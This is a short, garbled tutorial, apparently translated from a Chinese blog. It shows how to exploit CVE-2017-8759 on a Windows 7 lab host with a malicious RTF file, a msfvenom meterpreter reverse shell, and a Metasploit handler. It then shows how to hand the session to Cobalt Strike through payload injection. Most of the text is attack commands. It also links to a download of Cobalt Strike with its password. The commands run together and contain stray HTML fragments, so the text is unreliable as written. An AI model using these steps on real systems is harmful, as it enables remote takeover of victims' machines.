1. Preface
Metasploit gets a shell that derives to other tools, such as Cobaltstrike
Take cve-2017-8759 as an example to get a shell through MSF and derive it to Cobaltstrike
2. Environment
kali:192.168.229.143
win7:192.168.229.137
COBALTSTRIKE+JDK: Link: http://pan.baidu.com/s/1esj7p54 Password: krqncve--8759 -exp: https://github.com/bhdresh/cve-2017-8759.git
3. Exploit cve-2017-8759
# git clone https://Github.com/bhdresh/cve-2017-8759.git1) Generate RTF File # python CVE- .-8759_toolkit.py-m gen-w invoice.rtf-u http://192.168.229.143/logo.txt 2) to generate the MSF payload and start handler# Msfvenom-P windows/meterpreter/reverse_tcp lhost=192.168.229.143lport=4444-F exe >/tmp/Shell.exe # Msfconsole-X"Use Multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set lhost 192.168.229.143; Run" 3) to transfer the local payload in development mode# python CVE- .-8759_toolkit.py-m exp-e http://192.168.229.143/shell.exe-l/tmp/shell.exe
4. Derivation Shell to Cobalt strike
Open Cobalt strike Create a new listener
Inject a new payload into the current session
MSF exploit (handler) > Use Exploit/windows/local/payload_injectmsf exploit ( Payload_inject) > set payload windows/meterpreter/reverse_httpmsf Exploit (payload_inject) > set Disablepayloadhandler true msf Exploit (Payload_ Inject) > set lhost 192.168 . Span style= "COLOR: #800080" >229.143 msf exploit (payload_inject) > Span style= "COLOR: #0000ff" >set lport 1212 MSF exploit (payload_inject) > set SESSION 1 msf exploit (payload_inject) > Exploit
http://blog.csdn.net/qq_27446553/article/details/52282457
Metasploit derived shell